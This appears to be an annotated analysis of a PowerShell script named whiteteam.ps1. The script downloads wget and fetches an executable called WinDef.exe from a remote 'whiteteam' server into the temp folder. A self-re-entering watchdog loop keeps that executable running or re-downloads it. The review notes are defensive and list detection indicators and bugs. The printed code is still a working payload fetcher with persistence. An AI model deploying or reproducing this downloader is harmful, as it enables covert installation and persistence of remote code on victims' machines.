whiteteam.ps1
# powershell -ExecutionPolicy ByPass -File runYourselfEveryBlabla.ps1
# Maintenance script
# NOTE(review): the launch line above starts the script with the execution
# policy bypassed. A `-ExecutionPolicy Bypass -File <script>` command line is
# visible in process-creation logging and is a reasonable hunting pivot.
# $FIP is the host value passed to updatePort/updateVName and expanded into the
# wget argument string in get_dad; it is empty in this copy.
$FIP = ""
# Requests /whiteteam/port.html and returns the trimmed response body; the
# top-level code stores the result in $PORT.
# The URL literal is single-quoted, so PowerShell does not expand $FIP inside
# it and the string is used exactly as written.
# NOTE(review): plain HTTP, with no authentication or integrity check on the
# response. The /whiteteam/port.html request path is a usable indicator in
# proxy and web-server logs.
function updatePort($FIP){
$url = 'http://$FIP/whiteteam/port.html';
$response = (Invoke-RestMethod -Uri $url).Trim();
return $response;
}
# Requests /whiteteam/index.html and returns the trimmed response body; the
# top-level code stores the result in $filename and joins it to $save_dir to
# form $exefile, the path that Start-Mint later executes.
# The URL literal is single-quoted, so PowerShell does not expand $FIP inside
# it and the string is used exactly as written.
# NOTE(review): the remote response decides a local file name with no
# validation and over plain HTTP. The /whiteteam/index.html request path is a
# usable indicator in proxy and web-server logs.
function updateVName($FIP){
$url = 'http://$FIP/whiteteam/index.html';
$response = (Invoke-RestMethod -Uri $url).Trim();
return $response;
}
# Downloads a standalone 32-bit wget.exe with System.Net.WebClient and returns
# the path it was written to ($save_dir + '\wget.exe').
# $save_dir is not a parameter; it is read from the calling scope.
# NOTE(review): nothing here checks a hash or signature on the downloaded
# binary. For detection: a PowerShell process calling WebClient.DownloadFile
# for an .exe and writing wget.exe outside a software-install path shows up in
# script-block logging, file-creation events and proxy logs (host
# eternallybored.org, path /misc/wget/1.20/32/wget.exe).
function get_wget {
$filename = "wget.exe"
$wgetBinLocation = '' + $save_dir + '\' + $filename;
#$client = New-Object System.Net.WebClient
#https://eternallybored.org/misc/wget/
write-host "Downloading Wget!"
$url = "https://eternallybored.org/misc/wget/1.20/32/wget.exe"
(New-Object System.Net.WebClient).DownloadFile($url, $wgetBinLocation)
return $wgetBinLocation
}
# NOTE(review): the three lines below are a double-quoted string expression,
# not a comment. PowerShell evaluates it (expanding $VName and $FIP) and writes
# it to the output stream when the script reaches this point. It reads as an
# intended description of get_dad, the function that follows.
"
Get $VName from $FIP /whiteteam/ and return the location
"
# Runs the wget binary at $wgetBinLocation to fetch
# https://$FIP/whiteteam/WinDef.exe into $save_dir\$VName and waits for it to
# finish. $save_dir, $wgetBinLocation and $FIP are read from the calling scope.
# Output: because of -passthru the Start-Process object is emitted first,
# followed by $Location.
# NOTE(review): $VName is concatenated into the argument string unquoted, and
# in Start-Mint it comes straight from an HTTP response, so its content is
# parsed by wget as part of the command line. The fetched executable is not
# verified before use.
# For detection: wget.exe spawned by powershell.exe with a /whiteteam/WinDef.exe
# URL and a -O target in the temp directory. The remote name WinDef.exe
# presumably imitates a Windows Defender component - confirm against the sample.
function get_dad($VName) {
$Location = '' + $save_dir + '\' + $VName;
Start-Process -FilePath $wgetBinLocation -Args " https://$FIP/whiteteam/WinDef.exe -O $Location" -passthru -NoNewWindow -Wait
return $Location
}
# Watchdog loop: every 1200 ms it checks whether anything is listening on
# $PORT and, if not, starts $exefile again, downloading a replacement through
# get_dad when the file is missing.
# Parameters:
#   $FLocation - only forwarded to the recursive call; not otherwise used here.
#   $exefile   - path of the executable to keep running.
#   $PORT      - text searched for in the netstat output.
# NOTE(review): the finally block calls Start-Mint again, so the function
# re-enters itself whenever the try block is left. Ending only the child
# executable does not stop this; the hosting PowerShell process has to be
# terminated as well.
# For detection: netstat.exe and findstr.exe spawned by powershell.exe roughly
# once a second, and Start-Process on an executable under the temp directory.
function Start-Mint($FLocation,$exefile,$PORT) {
try
{
while ($true) {
# List listening sockets whose netstat line contains $PORT. findstr matches
# substrings, so any line containing those characters counts.
$R = netstat -a | findstr LISTENING | findstr $PORT
Write-Output $R
Write-Output $R.length
# A length greater than 1 is treated as "the port is already open", in which
# case the binary is not started again.
if ($R.length -gt 1) {
Write-Output "It's open."
# Do something if it's running
} Else { # Else it should execute the Bin/WinDef.exe again.
#Start-Process -FilePath "1.ps1" -passthru -NoNewWindow -Wait
Write-Output "$env:temp\1.ps1"
# Check whether the file exists
if ( Test-Path -Path $exefile){
# Launched without -Wait, so the loop continues while the process runs.
Start-Process -FilePath $exefile -passthru -NoNewWindow
} Else {
# If it does not exist, get it from the server or find another way to get a new file.
# Maybe get a site and from the output, Trim() them then get the new name.
# NOTE(review): hard-coded host 10.1.1.1 (not $FIP) over plain HTTP; the
# response body is passed to get_dad as the file name without validation.
$url = 'http://10.1.1.1/whiteteam/';
$response = (Invoke-RestMethod -Uri $url).Trim();
echo $response
$exefile = get_dad $response
# Recursive call; no $PORT argument is passed here.
Start-Mint $FLocation $exefile
}
}
# Wait before it runs again
Start-Sleep -Milliseconds 1200
}
}
finally
{
# Re-enters the watchdog with no arguments whenever the try block exits.
Start-Mint
}
}
# Get Wget
# NOTE(review): $save_dir is assigned further down, after this block. Unless it
# is already set in the session, the path built here is '\wget.exe' rather than
# a path under the temp directory, and get_wget reads the same value.
$wgetBinLocation = '' + $save_dir + '\wget.exe';
if (!(Test-Path $wgetBinLocation)){
Write-Output "The file does not exist"
$wgetBinLocation = get_wget
}
# Set up all values
# Working directory is the user's temp folder; the port and the executable name
# are taken from the two HTTP lookups.
$save_dir = $env:temp
$PORT = updatePort $FIP
$filename = updateVName $FIP
$exefile = '' + $save_dir + '\' + $filename;
#$save_path = '' + $save_dir + '\' + $filename;
# Get the location of the binary in the LHost
#$FLocation = get_dad $filename
# Start the real work
# NOTE(review): the get_dad and Start-Mint calls are commented out in this
# copy, so as shown the script stops after the wget download and the two
# lookups.
#Start-Mint $FLocation $exefile $PORT
#echo "end"